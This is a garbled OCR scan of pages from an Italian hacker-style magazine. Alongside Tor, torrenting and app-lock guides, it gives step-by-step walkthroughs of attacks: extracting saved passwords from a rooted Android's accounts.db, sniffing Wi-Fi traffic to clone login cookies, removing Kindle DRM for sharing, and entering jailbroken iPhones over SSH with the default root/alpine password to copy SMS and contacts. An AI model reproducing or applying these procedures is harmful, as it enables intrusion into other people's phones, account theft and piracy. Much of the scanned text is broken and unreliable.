3G via Wi-Fi o USB) possiamo proteggere 
anche tutti gli altri dispositivi connessi. 
Per farlo, basta selezionare l'opzione Tor 
Tethering sempre presente nel menu 
Settings 


Per incrementare ulteriormente il livello di 
sicurezza, possiamo evitare che Orbot uti¬ 
lizzi dei nodi italiani della rete Tor (e dun¬ 
que navigare utilizzando esclusivamente 
indirizzi IP stranieri) selezionando Exclude 
Nodes dal menu Settings e compilando 
il campo presente con Italy. Terminiamo 
con OK. Riconnettiamo quindi Orbot. Do¬ 
po aver attivato questi livelli di protezione, 
può capitare che durante la navigazione 
alcuni siti rilevino strani ■movimenti"sul 
nostro computer. Effettuando ad esempio 
una ricerca sul motore di Big G. potreb¬ 
be esserci richiesto l'inserimento di un 
captcha code prima di poter proseguire: 
inseriamolo senza indugi. 
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Enter Exclude Nodes 


LI 






























W PC e sma rtphone degli Hacker | Trucca lo smartphone 


Il file sharing 
dallo smartphone 

Con un telefonino Android e le applicazioni giuste, 
è possibile scaricare di tutto e di più dalle reti P2P... 


Cosaci 

occorre 

APP ANOROIO 
PER II FILE SHARING 

TTORRENT LITE 
©SEEiaSZESIi) 

Sito Intemflt: 

Play Store 

APP ANOROIO PERLA 
COMHVBIONE CLOUO 

DROPBOX 

Silo Interrici: 

Play Store 






S caricare e condividere file 
grazie a programmi P2P co¬ 
me eMule o sfruttando uno 
dei numerosi client Torrent (uTor- 
rent e BitTorrent sono i più utiliz¬ 
zati) è da anni una pratica conso¬ 
lidata (purtroppo anche nel su 
aspetto più deprecabile: lo 
bio di materiale protetto dal dirit¬ 
to d'autore). Fino a qualche tem¬ 
po fa, per accedere alle reti P2P 
era necessario l'uso di un perso¬ 
nal computer (e ovviamente di una 


connessione Internet). Oggi, inve¬ 
ce, con la diffusione di smartpho¬ 
ne e tablet "intelligenti", come i 
device con sistema operativo An¬ 
droid, è possibile installare l'ap¬ 
plicazione tTorrent Lite per cer- 
e scaricare file ovunque ci si 
ovviamente connettendosi 
Wi-Fi nelle vicinan- 
con il proprio 
operatorWAWTe una tariffa fiat 
per disporre di t®a($£q&dàti imi¬ 
tato. Inoltre, sarà 


ze 


spostare i file scaricati dal telefoni¬ 
no al computer e viceversa, sfrut¬ 
tando le potenzialità di Dropbox 
(www.dropbox.com), il servizio 
doud di file hosting ormai dispo¬ 
nibile per tutte le piattaforme mo¬ 
bile. Ovviamente, ricordiamo a tut¬ 
ti di prestare la massima attenzio¬ 
ne a quello che si scarica: nei cana¬ 
li Peer To Peer circola anche ma¬ 
teriale coperto da diritto d'autore 
il cui download, è bene ricordar¬ 
lo, è illegale! 


DROPBOX: 

ACCESSO VIA WEB 

log gandoci all'inter¬ 
faccia Web di Dropbox 
potremo caricare e sca¬ 
ricare file. Ogni cartella 
potrà essere condivisa a 
più persone. Basta die 
car e Invite tofrìder e 
invitare tramite e-mail i 
nostri amia. 


Verdi torrenti in piena nei quali 


Con tTorrent, 
un’app 
gratuita per i 
telefonini dotati 
di sistema 
operativo 
mobile Google, 
si possono 
scaricare 
e condividere 
file ovunque 
ci si trova. 


What's new 


■ Show 0*; as progress for files wirh ;.ero priority. 

• Fixed FC when adding new torrenti Troni searcb results 
- KixeO some olher torce eloscv 


Ti pre sento tTorrent 

Dallo smartphone Android carichiamo il Market e nel 
motore di ricerca cerchiamo la parola tTorrent. Selezio¬ 
niamo tTorrent Lite nell'elenco dei risultati e premiamo 
Scarica Terminata l'installazione, nella finestra del Market compa¬ 
rirà il tasto Apri Tappiamo su questo tasto ed eseguiamo per la 
prima volta tTorrent Lite, 


Il fiiua 

a 


La no stra prima ricerca 

Alla prima apertura di tTorrent Lite, comparirà un mes¬ 
saggio di avviso che riporta tutte le novità presenti 
nell'ultima versione dell'applicazione installata. Basta 
premere su Canee! per fare sparire il messaggio. Per effettuare 
invece una ricerca, premiamo sul simbolo della lente di ingran¬ 
dimento. 
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HI 2 GB di spazio per il P2P mobile! 

Utilizzando un account Dropbox e le applicazioni per PC e Android, possiamo sincronizzare i file scaricati via Torrent 
con computer e smartphone. Una bella comodità vero? Vediamo come fare 



j§> Scanner multimediale in esecuzione... 

& Dropbox 

C2 Uploads it F 


filesharing 


^ Up to Dropbox 


h— il. £ 199...udio.CD1-NDRT.< 
49.7 K6. rnodilieO 6 miniiles ago 




Dropbox per il PC... 

Dopo esserci registrati a Dropbox (www 
dropbox.com), ci viene chiesJsauogtemo 
installarell programma di 
spazio Cloud nel computer. Con questo progr;| 
potremo trasferire facilmente i file scaricati 
Torrent su Dropbox: basterà copiarli nell'apposita 
cartella del PC per sincronizzarli automaticamente 
su altri dispositivi (ad esempio sul cellulare). 


...e per lo smartp hone 

Dal Play Store di Android (o dall'App Store se 
abbiamo un iPhone), installiamo l’applicazio¬ 
ne Drapto sul telefonino. Quando la awie- 
imo ed effettueremo il login con l’account registrato 
foopox, vedremo i file caricati dal computer e 
m utfcarli direttamente in un tap. Tutti i file 
ni ■‘ile siili :-m, . jr|eJ|e del nostro spazio Drop- 
box sono voti,# f)ii«mKr etichetta Drappo* 



Upload istantaneo 

B Ogm file scaricato sullo smartphone può 
essere a sua volta caricato nella nostra 
cartella Dropbox. Per farlo, una volta ese¬ 
guita l'applicazione, selezioniamo l'etichetta Uploads 
Da qui, premiamo su Otfierfiles e navighiamo nelle 
cartelle del telefonino. Individuati i file, clicchiamo 
su Uploade attendiamo la sincronizzazione (trove¬ 
remo il file anche sul PC) 


“pescare” a costo ze 


f£ Scanner multimediale In esecuzione... 

£ Torrent Search (by Transdroidj 

Installare questa applicazione? 


Consenti all'applicazione: 

4 Comunicazione d) r«t»> 

accesso cornale' a « truci net 



f. A OS «E 


O T hS • 4 |§> ni ST 


Searcn Resuits 


ubuntu-11.10-desktop-i3B6.;so 

Sur. 695,3 mtSH: U'nit.'Xil 1 Hwri",s: 3. 

ubuntu-11.10-desktopamd64.iso 


Solo dai m otori fida ti 

Un nuovo messaggio ci indica subito la 
necessità di installare un componente 
supplementare del programma, quello che 
collega tTorrent Lite ai motori di ricerca on-line più 
diffusi e utilizzati. Premiamo quindi il tasto Installa 
per iniziare a scaricare e attendiamo il completa¬ 
mento del download. 


Add torrent 


ubuntu-11.10-desktop-l386.iso 


/sdcard/torrent 


Effet tuiamo il primo d ownload 

a Terminata l'installazione potremo cercare 
nei motori di ricerca e trovare gli stessi 
risultati che troveremmo con il computer. 
Trovato il file che ci interessa, premiamo bui suo 
nome per tare comparire la finestra di inizio down 
load. Da qui possiamo scegliere i singoli file con 
tenuti con Select fileso avviare il Download 


tTorient Lite 


ubuntu-11 10-desk t op-i386. iso 


Downloadmg - 0 , 0 % 

Ratio:0,000 Sir*.695,3MB 
Up'oadedrO 6 


ET». 3h Prtn 

Up. 6.4 Down 


Gestione dei trasferimenti 

Durante il download di uno o più file, pos¬ 
siamo anche controllare lo stato di avan¬ 
zamento dei singoli flussi premendo 
l’icona All (per vedere tutti i file), Dotvntoad/ngiquel- 
ii in corso) o Completed (dove sono riportati i file 
scaricati sul dispositivo e. quindi, già pronti da 
utilizzare), 
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L'aspira password | 




Ecco come 
il pirata 
scova tutte 
le password 
memorizzate 
nel telefonino 
della sua 
vittima. 


Tutto ha inizio da un app 

*| Se il pirata entra in possesso di un tele¬ 
fono “rootato", per iniziare la sua opera 
ha bisogno del file manager Root Explorer (può 
acquistarla direttamente da Google Play o cercare 
sul Web un apk funzionante). Dopo l'installazione, 
avvia Root Explorer e con un tap su Consenti gli 
assegna i permessi di amministrazione Si sposta 
dunque nella directory principale ed accede alla 
cartella data. 


G li smartphone e i tablet, ormai sempre 
più usati, sono a tutti gli effetti piccoli 
computer, e come tali sono esposti a 
tanti rischi in termini di sicurezza. Ci sia¬ 
mo mai chiesti, ad esempio, dove vengono 
memorizzate tutte le password che utiliz¬ 
ziamo per accedere agevolmente a Face- 
hook o alla casella di posta elettronica dal 
nostro terminale Android? Effettivamente 
non capita tutti i giorni di badare a questi 
particolari, visto che siamo ancora abituati 
a pensare allo smartphone come a un sem¬ 
plice telefonino. Così non è. Ogni password 
viene infatti memorizzata, il più delle volte 
in^Raro, all'Interno di un.database conte- 
^nunfjpxfiledi sistema di Android. In caso 


Tutto in chiaro 


V ri e Mnanpnone aegii nacKer 


ira password 
per cellulare 


C’è chi trasforma il proprio 
dispositivo in un passepartout per 
scardinare qualsiasi protezione 













| t'aspira password | 


PC e Smartphone degli Hacker 



Ecco lo sniffa tutto mobile 


Cronologia Web, indirizzi IP visitati, cookie... il pirata usa le app Shark for Root e Shark Reader per accedere 
a informazioni segrete sullo smartphone della vittima. Incredibile ma vero. 



« • «Mi 

0 AppUtftorl 

mm Staffe Reader 

... 


Uà n 

! ... ... .... 
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Un’app per la cattura... 

"| Prima dello sniffing dei pacchgtijl pirata 
I installa BusyBox da Googlef 
Scarica/Accetta e scarica, riawia 1^ 
ne e termina l'installazione, installa quindi 1^. 
Shark for Root sul telefono della vittima, la avvia' 
e con Consenti le assegna i permessi di ammi¬ 
nistrazione. Preme Start per catturare i pacchetti 
in transito sulla LAN'a cui è connesso. 



... e una per ranalisi 

2 ? Al termine della cattura, il pirata ricerca 
.— e installa l’app Shark Reader (fondamen¬ 
tale per la lettura dei pacchetti “sniffati"). Non gli 
" -tjLphe installarla. Dopo aver tappato Stop in 
tymM Root, il pirata analizza ciò che ha cat- 
turrWrqym^Bh Open^apture file(You can use 
Shark Beai 
base alla quantità 


ih® dei pacchetti dura in 


di smarrimento del telefonino o del tablet, 
ad un malintenzionato bastano realmente 
pochi secondi per impossessarsi di tutti i no¬ 
stri account. E non solo! Il malintenzionato, 
installando qualche app, è in grado anche di 



"sniffare” preziose informazioni j ne^g i 
che vistiamo e cookie, usabili per aco due» i 
servizi Web che utilizziamo. Affinché tutt® 
vada per il verso giusto, però, il pirata deve 
mettere le mani su un terminale dotato di 


^ Cookie d’accesso clo nati 

3 J Shark Reader decodifica i pacchetti cattu- 
rati da Shark for Root e visualizza l'IP del¬ 
la vittima, la destinazione raggiunta (il sito Web 
contattato dall'utente) e la porta di comunicazio¬ 
ne. Con un tap sul nome del pacchetto, visualizza 
informazioni come il browser usato e cookie scam - 
biati. Con questi ultimi può clonare sessioni di login 
ai servizi usati dalla vittima. 


diritti di amministrazione, ovvero, in gergo 
Tnico, "rootato". Prestiamo dunque mas 
5icwiattenzione a dove lasciamo il nostro 
St?simo telefonino: potremmo avere 
brutT^orprese. 


con un’app! 



Richiesta codice seriale... 

2 - Si sposta nella directory System e ricer- 
J ca il file accounts.db, owero il databa¬ 
se con i dati memorizzati per il login ai servizi 
on-line configurati sul telefonino. Il pirata tap¬ 
pa quindi sul file per avviarlo, seleziona la voce 
accounts e visualizza tutti gli account memoriz¬ 
zati Alcune password possono essere crittogra- 
fate ma il pirata ha i suoi metodi per decifrare 
ciò che vuole! 


ANALISI COMPLETA SUL COMPUTER 


L'analisi dei pacchetti sniffati può 
avvenire anche direttamente 
dallo smartphone Android. Ma 
se il pirata vuole avviare un pro¬ 
cesso di decodifica più accurato 
può trasferire il file .pcap, conte¬ 
nente tutti i pacchetti catturati 
da Shark for Root (e salvato nella 
home directory del terminale 
Android), sul proprio PC. Utiliz¬ 
zando poi il software Xplico (pre¬ 
sente nella distribuzione Linux 
BackTrack 5R2) e con un po' di 
fortuna può scoprire qualche 
password digitata dalle vittime 
connesse alla rete Wi-Fi, Per farlo, 
il pirata si procura una copia di 
BackTrack 5 R2 ed avvia da Ap- 
plications/BackTrack/Informa- 
tion Gathering/Network Analy 
sis/Network Traffic Analysis il 
software Xplico web gui Avvia 
quindi una nuova sessione del 


Terminale e digita il comando / 
etc/init.d/xplìco start 
Digita localhost:9876 nella barra 
degli indirizzi del browser per 
visualizzare l’interfaccia di Xplico. 
Inserisce ai campi username e 
password il testo xplico e confer¬ 
ma con un clic su Login. Preme 
New Case e da Data Acquistion 
sceglie Uploading PCAP captare 
file/s. Conferma con Create. 
Non gli resta che cliccare su New 


Session. inserire un nome idem 
beativo e confermare con Create 
Apre quindi la sessione appena 
creata, raggiunge la voce Pcap 
sete preme Browse per caricare 
il file .pcap trasferito dal telefoni¬ 
no al PC. Dopo aver confermato 
con Upload: Xplico si mette al 
lavoro decodificando tutti I dati 
catturati e fornendo in output 
tutto ciò che è riuscito a scovare. 

































































V ri e Smartphone degli Hacker | Trucca lo smartphone | 


Pirati degli e-book 
all'arrembaggio! 

Ecco come fanno gli smanettoni a togliere le protezioni dai libri 
digitali acquistati su Amazon per condividerli on-line 


N egli ultimi anni i libri in formato digita¬ 
le, i cosiddetti e-book, si sono diffusi a 
macchia d'olio, cosi come i dispositivi in 
grado di riprodurli. L'esempio più lampante è il 
Kindle, l'eReader prodotto e venduto dal colos¬ 
so dell'editoria digitale Amazon. Come molti sa¬ 
pranno, direttamente dal sito Amazo 
bile acquistare migliaia di titoli differì 
prezzo realmente conveniente. Ma c'è 
limitazione che a qualcuno proprio non va gii 
Supponiamo di recarci in libreria. Dopo un'ac¬ 
curata scelta, acquistiamo un nuovo libro in for¬ 
mato cartaceo: nessuno ci vieterà di prestarlo ad 



un nostro amico o, eventualmente, rivenderlo 
come usato. Ma quando acquistiamo un eBo- 
ok su piattaforme del calibro di Amazon (www. 
amazon.it) o di IBS (www.ibs.it) non è la stessa 
cosa. Ogni libro digitale è provvisto infatti di una 
protezione, in gergo tecnico DRM, che ne vieta 
la copia o la riproduzione su un dispositivo di¬ 
verso da quello autorizzato. Ciò equivale a dire 
I termine della lettura, se proprio non vo- 
fajpnservare il titolo nella nostra biblio¬ 
teca digitai, non abbiamo altra scelta che ce- 
stinarl<??q|f:h4^toene tdja la libertà di riven¬ 
derlo? SempliflaHjf^^jypItvenire la pirateria 






Pbam rud thè c»kbrr Htwvt* Aortemem 



GNU GENERAL PUBLIC LICENSE Version 3, 
29 June 2007 


CopyitjM (O 2001 Fit* &>»«ne Fouiujjiton, Ine. <hUp://l!UMj/> 

Breiyoiw te perniilo) lo copy mil dentane tettati» copte ol ite treni* 
Jl'Xiuicnt. bui cbnimiM il fa noi altero.’ 

Il softwarediaestigne degH^bgek 

B ll pirata inizia la sua opera installando sul PC l’ultima versio¬ 
ne di Calibre, prelevandola gratuitamente dal sito Web uffi¬ 
ciale, http://calibre ebook.com. Con un doppio clic sul file 
calibre-0.9. 15.exe avvia quindi l'installazione guidata. 



digitale ed evitare chegli eBookfacciano la stes¬ 
sa fine dei DVD-Video, dei Blu-ray o dei CD Au¬ 
dio. Ma gli smanettoni hanno trovato un modo 
per togliere i lucchetti dai libri elettronici acqui¬ 
stati proprio su Amazon, riuscendo dunque a 
creare copie perfettamente leggibili di ogni li¬ 
bro: così facendo, c'è chi acquista un nuovo li¬ 
bro e decide poi di condividerlo con l'intera Re¬ 
te o, nel caso dei libri più costosi, divide magari 
le spese di acquisto con un amico o un compa¬ 
gno di studi. Ovviamente, tale pratica è del tut¬ 
to illegale e nell'articolo ci limiteremo ad analiz¬ 
zare le mosse dello smanettone. 


a lì a 


Un’inte rfaccia in lingu a italian a 

i jp j g i Per completarla, lo smanettone awia il programma e sceglie 
spM la lingua italiana come quella predefinita per l'interfaccia 
Sa» grafica. Si sposta nel menu Preferenze, da qui, raggiunge 
la sezione Plugin per procedere all'installazione di alcuni tool. 



Servono dei pl ug-in! 

Lo smanettone ricerca sul Web il file tools_ v5.62.zip. Lo 
estrae e ritorna a Calibre: clicca Carica plugin da file e 
seleziona uno per uno i 5 archivi presenti nella cartella Ca- 
libre_Plugm( presente nell'archivio estratto in precedenza). 




L’add-o n è fondamen t ale... 

Al termine, abilita Mostra solo i plugin installali dall'uten¬ 
te e verifica che sotto Tipo di file sia presente l'estensione 
Kindle and Mobipocket DeDRM e Ignoble Epub DeDRM. 
sono questi i plug-m fondamentali pei portare a termine la sua opera. 


0 



LA BIBLIOTECA 
DIGITALE! 

Sebbene lo smanettone 
utilizzi Calibra per 
togliere le protezioni 
dagli eBook, non bisogna 
dimenticare che questo 
software non è per nulla 
illegale. Al contrario, è 
la soluzione perfetta 
per chi è alla ricerca di 
un programma in grado 
di catalogare tutti i libri 
elettronici, che siano essi 
in formato EPUB, MOBI 
o PDF. E peri lettori più 
incalliti, che conservano 
sul proprio hard disk una 

quantità spiupositàld di 

libri digitali, c'è un'inte¬ 
ressante funzionalità di 
ricerca tramite ISBN. Gra¬ 
zie a Calibra è quindi pos¬ 
sibile creare un potente 
e performante database, 
proprio come accade 
nelle biblioteche delle 
nostrecittà. Il software 
è disponibile anche per 
Linux e Mac OS X. 
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per lavorare con il Kin dle 

Se il pirata è in possesso di un dispositivo Kindle, è 
arrivato il momento per lui di effettuare uri doppio clic 
sul plug-in Kindle and Mobipocket DeDRM e compilare il 
campo elnk Kindle Serial numbers con il numero seriale deil’eRe- 
ader. Conferma quindi con OK 


Un sa!toMsitoper_a_cguistare un libro 

A questo punto avvia il browser e procede all'acquisto 
di un eBook su Amazon Si sposta nel menu II mio Kin- 1 
die del sito e raggiunge la sezione Libri. Seleziona quel¬ 
lo appena acquistato e clicca Azioni seguilo da Trasferire e sca¬ 
ricare tramite il cavo USB. Conferma con Scarica. 





La conversione adesso è in corso 

B ll pirata ritorna a Calibre e clicca sul pulsante Ag¬ 
giungi libri. Raggiunge il percorso nel quale ha 
salvato il file con estensione .azw scaricato dal sito 
Amazon e conferma premendo il tasto Apri. Con un clic 
destro sul file stesso si sposta in Converti libri e seleziona 
Converti individualmente. 



0 Nella nuova schermata Rpjpr^n smaneltone 
seleziona dal campo formafcrwiptff^teiio che pre 
ferisce, ad esempio EPUB. Volendolo anche modi 
ficare gli attributi associati al file o visualizzare un’anteprima del 
risultato finale. Avvia quindi la conversione del libro digitale con 
un semplice clic sul pulsante OK 




DRM: QUESTO 
SCONOSCIUTO 

Acronimo di Digital 
Rights Management, 
il DRM è un sistema 
ideato per difenderei 
titolari di diritti d'au¬ 


tore. In poche parole, si 
tratta di una sorta di fi¬ 
ligrana digitale che vie¬ 
ne aggiunta ad un file 
(che sia esso un video, 
un brano musicale o un 
eBook) che ne limita la 
copia e la diffusione. I 
libri in formato digitale 
distribuiti da Amazon, 
ad esempio, possono 
essere riprodotti simul 
taneamente solo su un 
singolo dispositivo, nel 
caso specifico il Kindle 
o il software che Ama 
zon ha sviluppato per 
Windows. In definitiva, 
ogni eBook acquistato 
è protetto, identifica 
bile e tracciabile. Ov¬ 
viamente, alla base del 
DRM c'è un algoritmo 
di crittografia definito 
da molti abbastanza 
sicuro ma, forse, non 
sufficientemente pre¬ 
stante da fermare gli 
smanettoni più evoluti! 


L’eBook è stato convertito 

Al leonine del processo (che dura davvero pochi secon¬ 
di), il risultato finale viene salvato nella directory Calibre 
Library creala automaticamente dal software in Docu¬ 
menti lo smanettone seleziona il file .epub prodotto ed è pronto 
per condividerlo con amici o sul Web 



Una verific a fina l ejrima di una bella lettura! 

Infine il pirata prova a riprodurre il libro con lo stesso 
Calibre Avvia il software e clicca Aggiungi Libri Passo 
7). Seleziona il file EPUB e conferma con Apri. Se tutto 
funziona, non gli rimane che trasferirlo nella memoria del suo 
eBook Reader. o anche del tablet e dello smartphone. 
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Cellulare: 
stop agli intrusi 


Cosa ci 
occorre 


APPPER ANDROID 

APPLOCK 

Quanto ro < Gratuito 
Sito Internet: 

https://play.google.com 


Ecco come proteggere le informazioni conservate su smartphone 
e tablet inibendo l'accesso alle app e alle funzioni del dispositivo 


A nche più del PC, nel nostro smartphone o tablet sono ar¬ 
chiviate tantissime informazioni che non dovrebbero mai 
cadere in mani sbagliate. Foto, SMS, e-mail, contatti e re¬ 
gistro delle chiamate sono facilmente accessibili a chi entra in 
possesso del nostro dispositivo, ma in questo caso non ci riferia¬ 
mo al ladro di turno che si appropria indebitamente del nostro 


telefonino. Amici e fidanzati curiosi che armeggiano con il no¬ 
stro smartphone possono muoversi tranquillamente tra le app, 
ficcanasando tra cose che vorremmo restassero riservate. Limi¬ 
tare l'accesso alle funzioni del dispositivo è semplice e possibile 
e di seguito vi mostriamo come raggiungere lo scopo su dispo¬ 
sitivi Android e iOS. 



Install iamo App Blocco 


B Attiviamo la connessione Wi-Fi o 3G sul 
dispositivo e avviamo il PlayStore Tappia¬ 
mo sull'icona che avvia la ricerca, digitia¬ 
mo App Blocco e scegliamo il primo dei risultati in 
elenco. Tappiamo su Installa/Accetta e scarica e 
attendiamo che l'installazione sia conclusa. 



Con figurazion i pr eliminari 

a Chiudiamo il PlayStore, passiamo all’elen¬ 
co delle app installate sul dispositivo ed 
eseguiamo App Lock. Per limitare l'acces¬ 
so alle impostazioni dell'app solo ai proprietari del 
dispositivo, la configurazione di App Blocco inizia 
con l'assegnazione di una password di sblocco. 


ive d’access o 

litiamo la password numerica, lappiamo 
OKe confermiamola inserendola nuova¬ 
mente (0/0. Il doppio inserimento è utile 
per essere certi di averla digitata correttamente, 
mentre il passaggio successivo ci garantirà l'ac¬ 
cesso all'app, anche se dovessimo dimenticarla. 


Domanda di Sicurezza 

.j passpaypal 

Risposta di Sicurezza 

Suggerimento Password (opzionale) 

a. account paypal 


Opzi oni per il recupero 

Come per gli account dei servizi Web, App 
Blocco permette di recuperare la password 
mediante una domanda di sicurezza. Di 
gitiamo la Domanda di Sicurezza e la risposta nelle 
relative caselle avendo cura di scegliere qualcosa 
che non sia facilmente deducibile da chi ci conosce. 


UjlfclUl I 

a 


a B ” A ^ ., t | rm 17:12 f B A sfr _ ^ ,.i| rm 17:12 

A App Lock (?) I Vlmpostazione di S! (?) % 


avanzato 


I 


IIQSelf 

Applicazione per conto terzi 

Adobe Reader 

Applicazione Sistematica 


E 




La m emoria fa brutti scherzi? 

Opzionalmente possiamo indicare anche 
un Suggerimento per la risposta corretta. 
Riempiamo anche quest’ultimo campo e 
salviamo. A questo punto ci sarà mostrato l'elenco 
delle app installate sul nostro dispositivo: prima di 
bloccarle dobbiamo ultimare la configurazione. 


Si prega di inserire la password 


_ 


non 




16 ) 


Dop pia modalità 

B Le opzioni per lo sblocco delle app sono 
accessibili tappando su Impostazioni La 
schermata presenta due schede ( Sblocco 
Numerico e Sequenza di Sblocco} dandoci la possi 
biittà di scegliere tra altrettanti metodi per accede¬ 
re ad App Blocco e utilizzare le app bloccate. 
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Trucca lo smartphone | 


PC e Smartphone degli Hacker t 
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Password o sequenza di sblocco 


B Se preferiamo utilizzare una password 
numerica, riempiamo i campi della scheda 
Sblocco numerico e salviamo. Se invece 
preferiamo utilizzare una sequenza, spostiamoci su 
Sequenza di sblocco, inseriamo la sequenza (Continuili. 
ripetiamo nuovamente la sequenza e confermiamo. 



Bloc chiamo le app ... 

B Ora che abbiamo impostato il metodo di 
sblocco per il nostro smartphone, possiamo 
passare alla scelta delle applicazioni da 
rendere inaccessibili. Torniamo alla schermata prin¬ 
cipale di App Blocco e spostiamo verso destra il se¬ 
lettore corrispondente al nome dell 'app da bloccare 



.. .e l e funzioni princip ali 


B Spostandoci su Avanzato inibiamo l'accesso 
alle funzioni principali del dispositivo In que 
sta scheda è possibile impedire che altri 
possano rispondere a una chiamata, installare o di¬ 
sinstallare app o terminare quelle in esecuzione (Si¬ 
stema di gestione dei programmi) tra cui App Blocco. 



Blocco person alizzato 

B a Tappando sull'ingranaggio ( Impostazioni) 
jl che appare in alto a destra possiamo per- 
m sonalizzare il comportamento di App Bloc¬ 
co. La spunta su Blocco di protezione attiva il bloc¬ 
co imposto sulle app (Passo 8 e 9). rimuovendola 
disabiliteremo la protezione di App Blocco. 



»* - 


■Qi 


Intemittore di sblocco ré 

Spuntando Bloccare 
terruttore rapido, un'icona di App 
nella barra di stato consentirà di rimuove¬ 
re rapidamente le limitazioni. Con Uscita pmwisoria 
permessa^ indicando il tempo stabilito, terminiamo 
e riavviamo un’app senza sbloccarla nuovamente. 


.'esecuzione di una delle app bloccate 
possibile solo dopo aver digitato la 
password o inserito la sequenza di sbloc¬ 
co. Nercaso in cui dovessimo dimenticarla, tappia 
mo su dimenticare la password, digitiamo la Rispo¬ 
sta dì sicurezza (Determinare i e reimpostiamola 


UN BLOCCO RESTRITTIVO ANCHE PER LE APP DELL'IPHONE 


Ottener sudlspósitivilOSfiPhene, iPad e iPod) strumenti 
analoghi ad App Bìocto pei Androld non rsempre 
possibile. Lo sfere ufficiale, infatti, non offre alcuna 
applicazione per giungere allo stesso risultato. App 
come Lodi Down ÌProtect, Disobie Launch o Locktopus 
possono essere scaricate sólo tramite Cydia. lo store 
alternativo accessibile esclusivamente dai dispositivi 
sucui e stato effettuato il jailbreak. Per quelli che invece 
hanno deciso di non sbloccare il proprio dispositivo, Ic¬ 
oniche possibilità di restringere l'uso delle funzioni sono 
quelle offerte dalla caratteristica integrata daifa Apple 
nei sistemi iOS 5 è superiori La funzione Restrizioni 
presente nella sezione Generati delle impostazioni, 
consente di limitare l'uso del dispositivo inibendo l'ac¬ 
cesso all'installazione delle app e a determinati contenuti 
come giochi e filmati Tappando su Abilita restrizioni 
potremo impostare la password di sblocco, dopodiché 
indicare quali funzioni e contenuti limitare. 
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■ Disable launch (disponibile nello store Cydta) permette di limitare l'accesso a qualunque app e 
funi ione del nostro iPhone ■ iPad sbloccato, l’oprione Restri rioni, invece, è l'unico modo per limitare 
fuso degli strumenti iOS su dispositivi con sistema operativo originale, quindi non jaltbroken. 
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Smartphone 
sotto attacco! 


Cosa ci /O 
occorre 

SMAKTI'HONE 

IPHONE 4S 

Oì'-m'k 1 €629,00 
Sito Internili 

www.apple.com 

SCANNEH Ot Ht7£ 


Ecco come fanno i pirati informatici a rubare i dati 
personali e i messaggi SMS inviati da un iPhone 


L I iPhone è uno dei cellulari più 
venduti e usati al mondo gra- 
I zie alla sua semplicità d’uso, 
alle tante funzionalità e all’eleva¬ 
ta sicurezza, conseguenza anche 
delle rigide limitazioni imposte 
da Apple per la pubblicazione di^ 
applicazioni sull'AppStore. Tutte 
ciò, però, ha agevolato la nasci-^ 
ta dello store alternativo Cydia, 
dove è possibile trovare app che 


aggiungono funzionalità "unof- 
ficial" all'iPhonc. Per installarle, 
però, lo smartphone deve essere 
preventivamente sbloccato effet¬ 
tuando un'operazione cosiddetta 
di jailbreak(la procedura, al li¬ 
mite della legalità, è facilmente 
^ribile su Internet). Tra le app 
Ltorizzate ce n’è una che si 
chi^Jj^jfcnSSH e permette di 
trasferte iCraeAile di grandi di¬ 


mensioni senza necessariamente 
passare per iTunes. 

Occhio alla password 

Affinché l’app funzioni corretta- 
mente suIl'iPhone deve essere at¬ 
tivo, ovviamente, il servizio che 
gestisce il protocollo SSII. E fin qui 
nessun problema, se non fosse che 
questa "porta” di comunicazione 
lasciata aperta e incustodita potreb- 


NMAP 

Lo li «vi mi VCO 

Silo Int-mct. 

http7/nina)).org 

CUENTFTP 

CYBERDUCK 

: « li •'CO 

Sito In ■ 

http7/cyberduck.cti 

DATABASE 

SOLITE FOR 
WINDOWS 

Gratuito 

Sito Intomot. 

www.sqlite.org 


□ L’iPhone è in tra 


Usando uno scanner di rete, ad un pirata informatico bastano pochi 
alla ricerca di possibili smartphone vulnerabili ai suoi attacchi. Studiamo 


r analizzare qualunque rete WLAN 
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^ | Gli attrezzi del mestiere 

■J ( Come prima operazione, il pirata instai 
-_v la sul proprio computer portatile dotato di 
connettività Wi-Fi il programma NMAP, disponi¬ 
bile in versione compatibile con tutti i principali 
sistemi operativi. Pochi clic ed eccolo pronto a 
compiere le sue malefatte. Il pirata attiva la con¬ 
nessione Wi-Fi, avvia il programma ed esegue 
una scansione con Scan. 


La mela si riconosce subito 

2 | Gli basta aspettare qualche istante per 
1 trovare tutte le periferiche connesse nel¬ 
le vicinanze. Si annota gli indirizzi IP individuali 
e li inserisce nel campo Target per individuare 
l’iPhone della vittima. L’attacco funziona anche 
se lo smartphone è connesso su rete 3G. In que¬ 
sto caso, il pirata cercherà di ricevere un’e-mail 
dalla vittima. 


La vìttima è in trappola! 

3 ( Ricevuto il messaggio, il pirata ne copia il 
—* sorgente e lo incolla nell'apposito campo 
di testo nella pagina Web vvww.ip-adress com/ 
trace_email per scoprire I IP della vittima. A que¬ 
sto punto, il pirata verifica se il servizio SSH è 
attivo suIl’iPhone: in NMAP digita TIP in Target 
Se la porta 22 è aperta, allora può portare a ter¬ 
mine l'attacco. 
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| Smartphone sotto attacco! | PC e Smartphone degli Hacker 


I Gli SMS sono in perìcolo 

II pirata è riuscito a colleaarsi in maniera anonima e invisibile all’iPhone della vittima. A questo punto ha libero 
accesso alla memoria dello smartphone e a tutti i dati personali in essa archiviati! 
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-k : Ac cessi non autorizzati 

1 f Individuato l'indirizzo IP della 
•m=J ficata la vulnerabilità del suo 
ta usa il programma CyberDuck per 
SSH al dispositivo Avviato il software, si 
allo smartphone cliccando Nuova connessione e 
usando i dati di accesso predefiniti: root e alpine A 
questo punto ha libero accesso al telefono! 


vrii- 


-v Cartelle senza protezione 

2 Una volta completata la connessione con lo 
smartphone della vittima designata, il pirata 
la cartella /private/var/mobile/Library 
vengono archiviati i dati personali 
gli SMS. le foto, i video 
e i affitti rep»ihjtt ri spettivamente nelle sotto¬ 
cartelle SMSwetft'i &ILfilstory Address Book 


be essere sfruttata da un eventuale 
malintenzionato per accedere alla 
memoria interna dell’i Phone e otte¬ 
nere così libero accesso ai database 
contenenti SMS, contatti e immagi¬ 
ni! Per farlo, gli basta semplicemen¬ 
te col legarsi in rete allo smartphone 


autenticandosi con la password c 
protezione per l'esecuzione delle 
applicazioni che pochi utenti del 
mclafoninosi ricordano di modifi¬ 
care. A questo punto, portare a 
termine un attacco del genere 
diventa davvero un gioco da 


e coi 


tecnica^ 

protegg 


ìac 




-v È tutto in un database 

3 ; Se è interessato ai messaggi di testo che la 
vittima ha scambiato con i suoi contatti, il 
pirata copia il file sms.db. il suo formato indica che 
si tratta di un database a cui il pirata può accedere 
mediante il programma gratuito SQLite. Importato 
